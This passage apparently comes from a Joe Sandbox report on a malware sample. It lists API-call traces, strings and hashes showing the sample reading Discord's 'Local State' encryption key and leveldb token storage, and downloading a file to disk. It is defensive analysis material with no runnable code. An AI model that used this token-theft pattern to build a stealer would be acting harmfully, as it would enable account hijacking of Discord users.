                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$Heap$Process$AllocNamememsetstrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2002865342-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d711198b1f504583e68a46c82701488b5e9e546d10a23a30cfae441c6611febe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 34afd6592ec8d0e6f1858942ae0d643bae2899fd03f8c159827732ad67307064
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d711198b1f504583e68a46c82701488b5e9e546d10a23a30cfae441c6611febe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8113CA57813283AE12132223DC7FBF159C9F92BD9F90012AFA04740C3AA9DDD4650FE
                                                                                                                                                                                                                                                                                                  Function 004153A0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 252stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004153BA
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004153D0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415403
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\discord\), ref: 00415415
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415423
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,Local State), ref: 0041542F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004078F0: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004078F0: lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004078F0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411C00: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041552D,?,?,?), ref: 00411C0B
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,dQw4w9WgXcQ,?,?,?), ref: 00415535
                                                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0041568B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407790: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0040402F,00000000,?,?,?,?,?,?,?), ref: 0040779E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407790: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?), ref: 004077CF
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042150A), ref: 00415659
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,-0000000C), ref: 0041566B
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421509), ref: 00415679
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$AllocFileLocal$FreeGloballstrcpylstrlenmemset$AttributesCloseCreateFolderHandlePathReadSize
                                                                                                                                                                                                                                                                                                  • String ID: Local State$\discord\$dQw4w9WgXcQ
                                                                                                                                                                                                                                                                                                  • API String ID: 3817223191-2067953968
                                                                                                                                                                                                                                                                                                  • Opcode ID: 98569c066dfb2110dfc6498ec6d2e61ad14d41572c1f291bde53b892ab896a34
                                                                                                                                                                                                                                                                                                  • Instruction ID: 194099574810176e2e4ab308ae0ea84b9e6f71d167dd19124bd853461179d086
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98569c066dfb2110dfc6498ec6d2e61ad14d41572c1f291bde53b892ab896a34
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EA17F71D007099BDB10EFB5CC85AEEB7B8FF48304F00455AF905A7152EB78AA85CBA5
                                                                                                                                                                                                                                                                                                  Function 0041D190 Relevance: 18.2, APIs: 12, Instructions: 179filetimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1A1
                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1E5
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041D200
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041D21B
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041D224
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D235
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041D254
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D265
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D2E6
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D305
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D321
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D346
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$Time$HandleInformationSizeSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3339682767-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7dc5ab211660f74088cffd7409125a6117dcca4ff2d4ad636a370f5fe0998741
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1051F1B1604705AFE3208F15CC91B6BB7E8FB84744F10492DF595AB290D778E881CB59
                                                                                                                                                                                                                                                                                                  Function 00415BF0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\discord\,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415C48
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415C68
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415C7F
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415C8D
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\Local Storage\leveldb\CURRENT), ref: 00415C99
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415CA3
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\Local Storage\leveldb), ref: 00415CAF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415700: strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileHeaplstrcpystrlen$AllocAttributesFindFirstFolderPathProcessmemcmpwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: \Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                                  • API String ID: 1512132791-1179288657
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                                  • Instruction ID: db52eabd1130b4015811ae594007c4c182e7f7f0e4775522e0b09ec713fe86e8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D41A471900619ABC710EB719C86DEEB36CBF88348F40454AF64666052DB7CF6C58BA9
                                                                                                                                                                                                                                                                                                  Function 00404100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 119networkfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: https
                                                                                                                                                                                                                                                                                                  • API String ID: 2507841554-1056335270
                                                                                                                                                                                                                                                                                                  • Opcode ID: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
                                                                                                                                                                                                                                                                                                  • Instruction ID: e26aa42ddcce7a9dc6db16cb5d707b66fd772de428dd0f6f7d264c55934dbf87
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9041E9719002199BDB10EFB0DD85BEE77B9EF84348F004029F901A7191DB78A98AC7E9
